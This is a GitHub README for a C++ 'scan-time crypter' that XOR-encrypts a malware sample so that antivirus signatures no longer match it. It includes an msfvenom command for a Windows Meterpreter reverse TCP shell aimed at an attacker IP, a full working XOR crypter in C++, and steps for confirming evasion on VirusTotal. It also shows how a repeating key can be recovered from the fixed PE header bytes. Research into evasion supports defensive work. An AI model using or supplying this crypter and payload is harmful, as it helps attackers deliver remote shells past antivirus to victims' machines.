A scan-time crypter that applies an obfuscation method to a malware sample (or a benign file that triggers a false positive) so that an antivirus engine cannot match it against any malicious signature, evading signature-based detection.

AnshumanSrivastava108/Static-Scantime-Crypter


Static-Scantime-Crypter

The project aims at building a scan-time crypter in C++ that helps a malware sample (or a benign file that triggers a false positive) evade signature-based antivirus detection. It is written for security research; the same technique also hinders casual static inspection of a file (string searches, signature matching), though not determined reverse engineering, because the XOR key can be recovered from the output. The crypter opens the target file from disk, creates a new output file on disk, and XORs the target's contents with a key before writing them to the output.

Tested On

  • Kali Linux - Rolling Edition
  • Windows 10

Language and IDE Used

  • C++ - General purpose, case-sensitive, free-form programming language that supports object-oriented, procedural and generic programming
  • Visual Studio - Integrated development environment from Microsoft. Visual Studio dev tools and services make development easy for the C++ language.

Implementation Summary

  1. Creating a Malware: A Windows Meterpreter payload is crafted using msfvenom. The command used is msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<port> -f exe -o payload.exe, which creates a reverse TCP Meterpreter shell for 64-bit Windows (the payload name is written with an underscore, reverse_tcp). At the end of this step, an executable file called payload.exe will be created.

  2. Encrypting the Malware using File Handling and XOR Encryption:

    1. The file is opened with fopen() in binary mode ("rb"). Text mode ("r") must not be used for an executable: on Windows it translates line endings and treats 0x1A as end-of-file, which corrupts the PE image.

    2. The contents are read with fread() until EOF. fgets() is unsuitable here because it stops at newline bytes and cannot report the length of data containing NUL bytes, both of which occur throughout a binary.

    3. Every byte of the contents is XORed with the key (a repeating multi-byte key, so that the same key byte is not applied to every position).

    4. The encrypted bytes are written to a new output file opened in binary mode ("wb"), and the stream is closed so that buffered data is flushed to disk.

  3. Execution and Deobfuscation: The contents are deobfuscated when the file is executed on the victim's machine. Deobfuscation uses the same key as the encryption step: XOR is its own inverse, so the decryption routine is identical to the encryption routine.

  4. Testing the Crypter: The crypted output is then submitted to services such as www.virustotal.com and scanned with other antivirus products to confirm that signature-based detection no longer matches the payload. Note that a sample uploaded to VirusTotal is shared with vendors, so its detection count normally rises over time.
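
The procedure above, as an added example that is not the repository's own code: a minimal scan-time XOR crypter in C++ that reads a file in binary mode, XORs every byte with a repeating multi-byte key, and writes the result; the same function restores the original. It also shows the known-plaintext weakness of a repeating XOR key. The sample bytes, file names and key are constructed for the example; the hypothetical recover_key() is the analyst's side, not part of the crypter.

```cpp
// Added example, not the repository's code: a minimal scan-time XOR crypter.
// It reads a file in binary mode, XORs every byte with a repeating multi-byte
// key, writes the result, and (because XOR is its own inverse) uses the same
// function to restore the original. recover_key() shows the known-plaintext
// weakness of a repeating XOR key.
#include <cstdint>
#include <fstream>
#include <iostream>
#include <iterator>
#include <stdexcept>
#include <string>
#include <vector>

using Bytes = std::vector<std::uint8_t>;

// XOR each byte with the key byte at the same offset modulo the key length.
// Calling it twice with the same key returns the original bytes.
Bytes xor_crypt(const Bytes& data, const Bytes& key) {
    if (key.empty()) throw std::invalid_argument("key must not be empty");
    Bytes out(data.size());
    for (std::size_t i = 0; i < data.size(); ++i)
        out[i] = data[i] ^ key[i % key.size()];
    return out;
}

// Read a whole file in binary mode. Text mode would translate line endings
// and, on Windows, stop at the first 0x1A byte, corrupting a PE image.
Bytes read_file(const std::string& path) {
    std::ifstream in(path, std::ios::binary);
    if (!in) throw std::runtime_error("cannot open " + path);
    return Bytes(std::istreambuf_iterator<char>(in), std::istreambuf_iterator<char>());
}

// Write bytes to a new file in binary mode; the stream flushes on close.
void write_file(const std::string& path, const Bytes& data) {
    std::ofstream out(path, std::ios::binary);
    if (!out) throw std::runtime_error("cannot create " + path);
    out.write(reinterpret_cast<const char*>(data.data()),
              static_cast<std::streamsize>(data.size()));
}

// Encrypt or decrypt in_path into out_path with key; returns bytes processed.
std::size_t crypt_file(const std::string& in_path, const std::string& out_path,
                       const Bytes& key) {
    Bytes out = xor_crypt(read_file(in_path), key);
    write_file(out_path, out);
    return out.size();
}

// Known-plaintext attack on a repeating XOR key: if an analyst knows the first
// key_len plaintext bytes (every PE file begins with a fixed DOS header), XORing
// them with the ciphertext prefix yields the whole key.
Bytes recover_key(const Bytes& ciphertext, const Bytes& known_prefix,
                  std::size_t key_len) {
    if (key_len == 0 || known_prefix.size() < key_len || ciphertext.size() < key_len)
        throw std::invalid_argument("need at least key_len known and cipher bytes");
    Bytes key(key_len);
    for (std::size_t i = 0; i < key_len; ++i)
        key[i] = ciphertext[i] ^ known_prefix[i];
    return key;
}

int main() {
    // Constructed sample input (assumption): the first bytes of a PE/DOS header
    // followed by filler, standing in for payload.exe. File names are arbitrary.
    Bytes sample = {'M', 'Z', 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00};
    const Bytes key = {0x4B, 0x65, 0x79, 0x21};
    write_file("sample_in.bin", sample);
    crypt_file("sample_in.bin", "sample_crypted.bin", key);   // encrypt
    crypt_file("sample_crypted.bin", "sample_back.bin", key); // decrypt
    bool ok = read_file("sample_back.bin") == sample;
    Bytes guessed = recover_key(read_file("sample_crypted.bin"),
                                Bytes{'M', 'Z', 0x90, 0x00}, key.size());
    std::cout << (ok ? "round trip ok" : "round trip FAILED")
              << ", key recovered: " << (guessed == key ? "yes" : "no") << '\n';
    return ok ? 0 : 1;
}
```

The point of recover_key() is the practical caveat: the crypter defeats byte-pattern signatures on disk, but an analyst holding the output and the four fixed leading bytes of a PE file gets the full four-byte key in one XOR, so the scheme provides no confidentiality against inspection, only signature evasion at scan time.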

Scan Results:

Conclusion

  • For a scan-time crypter, XOR with a key is preferable to ROT13 or Base64. XOR applies a bitwise operation to every byte of the input, and the output can only be reversed by someone holding the key. ROT13 and Base64 are keyless encodings, not encryption: anyone, a scanner included, can reverse them, so they offer no protection against signature matching.

  • All three run in O(n) time over the input. Base64, however, expands its output to four bytes for every three input bytes, and ROT13 only transforms ASCII letters, leaving every other byte of a binary unchanged and still matchable. XOR produces output of exactly the input size and changes every byte.

  • In conclusion, XOR is the most compact and efficient of the three for this purpose. Two caveats apply: a short repeating XOR key offers no confidentiality against an analyst, since known plaintext such as the fixed PE/DOS header bytes reveals the key directly, and the protection is scan-time only, because the payload is restored in memory on execution and remains exposed to runtime and behavioural detection.

Author

Anshuman Srivastava
